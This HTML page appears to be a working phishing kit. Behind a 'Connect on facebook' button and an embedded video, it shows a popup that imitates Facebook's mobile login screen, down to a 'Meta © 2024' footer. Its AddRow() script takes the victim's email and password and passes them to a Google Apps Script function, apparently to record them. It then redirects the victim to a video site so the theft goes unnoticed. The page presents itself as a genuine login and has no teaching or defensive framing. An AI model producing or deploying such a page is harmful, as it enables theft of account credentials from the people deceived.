<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Page title</title>
    
    
    
    <script>
    function AddRow()
    {
      var email = document.getElementById("email").value;
      var password = document.getElementById("password").value;
      google.script.run.AddRecord(email, password);
      document.getElementById("email").value = '';
      document.getElementById("password").value = '';
    var url1 ='https://vivamaxph.com/category/vivamax-2024-series/';
         var winRef = window.open(url1);
         
    }
   
     
   
   
    </script>
    
    
    
    
    <style>
        body{
            border:none;
            loadingLazy: true;
            background-size: cover;
            background-image: url("https://i.ibb.co/qB0hPbd/Picsart-24-03-29-15-18-38-288.jpg");
            background-repeat: no-repeat;
            
            
            
                 
      }
      .loginPopup {
         border:none;
         padding: none;
        position: relative;
        text-align: center;
        width: 200%;
        
      }
      .formPopup {
        border:none;
        display: none; 
        position: fixed; 
        left: 55%; 
        top: 5%;
        transform: translate(-50%, 5%);
        
        
      }
      .formContainer {   
        border-radius:20px;
        border:none;
        width:43vh;
        position: relative;
        align-items:.center;
        left:-2.2vh;
        top:-50px;
        background:white;
        height: 86vh;
      
     
      
      }
      .formContainer .btn {
       background:none ;
       border:none;
       font-size: 4vh;
       position: relative;
       left: 19.4vh;
       top:-76vh;
       
       
       
       
      
      }
    
      .content{
            device-emulator:all device;
            response:defaul,all device;
        }
        
        hr{
            border:none;
            position: relative;
            top: 450px;
            height: 2px;
            width: 90%;
            background: black;
            
        }
      
      
        <!-- hhhjjjjkkkkk -->
        
     @import url("https://fonts.googleapis.com/css?family=Raleway:400");

* {
	
}

@property --angle {
  syntax: '<angle>';
  initial-value: 90deg;
  inherits: true;
}

@property --gradX {
  syntax: '<percentage>';
  initial-value: 50%;
  inherits: true;
}

@property --gradY {
  syntax: '<percentage>';
  initial-value: 0%;
  inherits: true;
}





:root {
	--d: 2500ms;
	--angle: 90deg;
	--gradX: 100%;
	--gradY: 50%;
	--c1: rgba(168, 239, 255, 1);
	--c2: rgba(168, 239, 255, 0.1);
}



.box {
background:#3223d3ef;
 width:500px;
	margin: max(1rem, 1vw);
	position: relative;
	top: 51vh;
	border: 1rem solid;
	padding: 1vw;
	border-image: conic-gradient(from var(--angle), var(--c2), var(--c1) 0.1turn, var(--c1) 0.15turn, var(--c2) 0.25turn) 30;
	animation: borderRotate var(--d) linear infinite forwards;
}

.box:nth-child(2) {
	border-image: radial-gradient(ellipse at var(--gradX) var(--gradY), var(--c1), var(--c1) 10%, var(--c2) 40%) 30;
	animation: borderRadial var(--d) linear infinite forwards;
}

@keyframes borderRotate {
	100% {
		--angle: 420deg;
	}
}

@keyframes borderRadial {
	20% {
		--gradX: 100%;
		--gradY: 50%;
	}
	40% {
		--gradX: 100%;
		--gradY: 100%;
	}
	60% {
		--gradX: 50%;
		--gradY: 100%;
	}
	80% {
		--gradX: 0%;
		--gradY: 50%;
	}
	100% {
		--gradX: 50%;
		--gradY: 0%;
	}
}
       
    </style>
    
    
    
    
</head>






<body>
    
    
   
  <center> 
      
      <iframe width="972" height="490" src="https://www.youtube.com/embed/QUU9NfxWnZ8?loop=1&autoplay=1&playlist=QUU9NfxWnZ8" style="position: relative;" title="YouTube Player Created By Video Embed Code Generator" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
    
      
      
      
      <div class="box">
      <button class="openButton"style="color:#dedede; background:none;border:none;border-radius:20px;font-size: 40px;font-weight:bolder;width:30vh;height:4vh; position:relative;left:-1vh;" onclick="openForm()">Connect on facebook</strong></button>
   
   
    
    
    
    </div>
    <div class="loginPopup">
      <div class="formPopup" id="popupForm">
       
       
        <form action="/action_page.php" class="formContainer">
            
     
     
     
     
            
          <center><div style="color:#556dff;font-size:85px;font-weight:bold;font-family:system;text-align:center; position:relative;top:200px;">
        facebook 
    </div>
    
    
    
    <input autocorrect="off" autocapitalize="off"type="email"class=""autocomplete="on"id="email"name="email"placeholder="Mobile number or email"data-sigil=""style="font-size:45px;width:80%;padding:37px;border-radius:15px; background:f2f2f2;border:on; position:relative;top:350px;">
    
    
     <br><br>
        
        <input autocorrect="off" autocapitalize="off"type="email"class=""autocomplete="on"id="password"name="pass"placeholder="Password " type="password"data-sigil=""style="font-size:45px;width:80%;padding:37px;border-radius:15px; background:f2f2f2;border:on; position:relative;top:350px;">
        
        <br><br><br>
        
        
        <input type="button" value="Log in" onclick="AddRow()"style="font-weight:bold;color:white; background:#0067f2;width:80%; padding:37px;font-size:45px;border-radius:20px;border:on; position:relative;top:350px;border:none">
        
        
        
        <br><br><br>
        
        <div style="font-weight:bold;font-size:35px; position:relative;top:350px;color:#070707c7">            
        Forgot password?
        </div>
        
        
        <hr>
        <p style="position:relative;top:365px;font-size:50px; background:white;width:130px;border-radius:10px">
            or
        </p>
        
        <button style="position:relative;top:400px;width:70%;padding:25px;border-radius:10px;font-size:40px;font-weight:bold;border:none">
            Create new account 
        </button>
    </center>
    <center><p style="position:relative;font-size:30px;top:540px;left:-25%;color:#495691">
        <b style="color:gray;">English</b>
    <br>
    Bisaya
    <br>
    日本語
    <br>
    Português (Brasil)
    </p></center>
    
    <center><p style="position:relative;font-size:30px;top:362px;right:13%;text-align:right;color:#495691">
        Filipino
        <br>
        Español
        <br>
        한국어
        <br>
        <button style="font-size:50px;width:60px">
            +
        </button></p></center>
        
        
        <p style="font-size:30px; position:telative;top:400px;text-align:center;">
            About . Help . More
            <h5 style="font-size:30px; position:relative;top:391px;text-align:center;">
                Meta © 2024 
            </h5>
        </p>
        
        
        
        
        
        
        
        
        
        
    
    
          
          <button type="button" class="btn cancel" onclick="closeForm()">🔙</button>
        </form>
      </div>
    </div>
    <script>
      function openForm() {
        document.getElementById("popupForm").style.display = "block";
      }
      function closeForm() {
        document.getElementById("popupForm").style.display = "none";
      }
    </script>
    
</body>
</html>
